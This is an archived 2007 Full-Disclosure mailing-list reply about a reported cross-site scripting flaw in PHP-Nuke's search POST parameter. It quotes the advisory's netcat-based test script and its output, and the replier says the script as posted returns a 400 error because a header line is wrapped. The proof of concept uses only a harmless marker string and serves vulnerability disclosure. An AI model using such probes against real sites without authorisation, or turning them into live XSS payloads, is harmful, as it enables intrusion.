lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <45F4605E.7020203@castlecops.com>
Date: Sun, 11 Mar 2007 16:02:38 -0400
From: Paul Laudanski <paul@...tlecops.com>
To: ascii <ascii@...amail.com>
Cc: vuln@...urity.nnov.ru, webappsec@...ts.owasp.org, news@...uriteam.com,
	full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	vulnwatch@...nwatch.org
Subject: Re: Php Nuke POST XSS on steroids



ascii wrote:
> Php Nuke POST XSS on steroids
>
>  Name              Php Nuke POST XSS on steroids
>  Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
>                    others (partially verified)
>  Severity          Medium
>  Vendor            http://php nuke.org/
>  Advisory          http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
>  Authors           Francesco `ascii` Ongaro (ascii@....it)
>                    Stefano `wisec` di Paola (stefano.dipaola@...ec.it)
>  Date              20070307
> --- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8
>
> #!/bin/bash
>
> cat > REQ << TOKEN
> POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
> Host: www.phpnuke.org
> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
> Gecko/20070220 Firefox/2.0.0.2
> Accept:
> text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
> Accept-Language: en-us,en;q=0.5
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Connection: close
> Referer: http://www.phpnuke.org/modules.php?name=Downloads
> Cookie: lang=english
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 23
>
> query=token<>token
>
> TOKEN
>
> cat REQ | nc www.phpnuke.org 80 -vvv
>
> --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8
>
> $ ./testcase | grep "token<>token"
> DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
> www.phpnuke.org [67.15.16.43] 80 (http) open
> <form
> action="modules.php?name=Downloads&amp;d_op=search&amp;query=token<>toke
>
> Regards,
> Francesco `ascii` Ongaro
> http://www.ush.it/
>
>   
I tried both your scripts at a few locations, and all I get back is this:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
Gecko/20070220 Firefox/2.0.0.2</pre>
</p>
</body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ